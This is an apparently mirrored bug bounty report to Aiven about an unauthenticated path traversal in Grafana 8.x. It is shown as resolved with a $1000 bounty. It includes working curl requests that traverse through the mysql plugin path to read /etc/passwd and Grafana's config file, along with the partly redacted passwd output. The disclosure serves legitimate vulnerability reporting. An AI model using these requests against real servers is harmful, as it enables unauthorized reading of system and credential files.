Loading HuntDB...
Hunt
Vulnerability Intelligence by wss.sh
Home Daily Briefings High Impact CVEs Recent Exploits KEV Catalog GitHub Advisories Latest Updates Security News
Sign In Sign Up

Zero day path traversal vulnerability in Grafana 8.x allows unauthenticated arbitrary local file read

High
A
Aiven Ltd
Submitted None
Actions:
View on HackerOne
Reported by j0v

Vulnerability Details

Technical details and impact analysis

Path Traversal
## Summary: Hi team, I've found a path traversal issue in the Grafana instances hosted on the Aiven platforms. With the path traversal it's possible for an unauthenticated user to read arbitrary files on the server. ## Steps To Reproduce: 1. Login at https://console.aiven.io 1. Create a new Grafana instance and wait till it's up and running 1.Run the following curl command to get the content of the /etc/passwd file on the server: ``` curl https://grafana-303ca6f8-████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd ``` Output: ``` $ curl https://grafana-303ca6f8-███████.aivencloud.com/public/plugins/mysql/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:65534:65534:Kernel Overflow User:/:/sbin/nologin ███ █████ ██████ ██████████ ██████████ ████████ ██████ systemd-network:x:192:192:systemd Network Management:/:/sbin/nologin systemd-coredump:x:992:991:systemd Core Dumper:/:/sbin/nologin systemd-resolve:x:193:193:systemd Resolver:/:/sbin/nologin systemd-timesync:x:991:990:systemd Time Synchronization:/:/sbin/nologin ██████████ dbus:x:81:81:System message bus:/:/sbin/nologin █████ ████████ ██████ █████████ ██████████ ███ ██████████ ███ █████ █████████ ██████████ ███ ███ ████ ███ ``` Some other examples: See the Grafana config: ``` curl --path-as-is https://grafana-303ca6f8-█████████.aivencloud.com/public/plugins/mysql/../../../../../../../../../../../../usr/share/grafana/conf/defaults.ini ``` I'll keep my Grafana instance running so you can try to reproduce it with the examples above. ## Impact An unauthenticated user can get access to all system files if he knows the exact path of the file.

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$1000.00

Submitted

Weakness

Path Traversal